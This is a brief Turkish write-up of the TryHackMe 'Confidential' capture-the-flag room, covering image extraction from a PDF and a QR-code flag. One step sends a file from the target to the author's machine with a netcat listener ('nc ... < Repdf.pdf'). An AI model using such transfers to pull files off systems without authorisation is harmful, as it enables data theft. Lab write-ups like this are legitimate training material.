Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Confidential” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Hedef makinedeki PDF dosyasını kendi makineme aktarıyorum.
# Hedef Makine
ubuntu@thm-confidential:~/confidential$ nc 10.8.94.51 4444 < Repdf.pdf
# Kendi Bilgisayarım
[root:...ktop/TRYHACKME/Confidential]# nc -lvnp 4444 > Repdf.pdf
Listening on 0.0.0.0 4444
Connection received on 10.10.141.32 56868
2 — PDF dosyasının içerisindeki görüntüleri çıkarmak için “pdfimages” komutunu kullanıyorum. Bu komutu kullanabilmek için “apt install poppler-utils” paketini indirmelisiniz.
Komutun açıklaması:
- “pdfimages”: Bir PDF dosyasındaki görüntüleri ayıklamak için kullanılan bir komut.
- “-all”: Tüm sayfalardaki görüntüleri ayıklamak için bu seçenek kullanılır.
- “Repdf.pdf”: İşlem yapılacak olan PDF dosyasının adı veya yolunu belirtir.
- “images”: Ayıklanan görüntülerin kaydedileceği klasörün adıdır. Bu adı istediğiniz gibi değiştirebilirsiniz.
[root:...ktop/TRYHACKME/Confidential]# pdfimages -all Repdf.pdf images
[root:...ktop/TRYHACKME/Confidential]# ls
confidential.txt images-000.png images-001.png images-002.png Repdf.pdf
3 — Çıkan fotoğraflardaki QR kodunu tarattıktan sonra bayrağı elde ediyorum.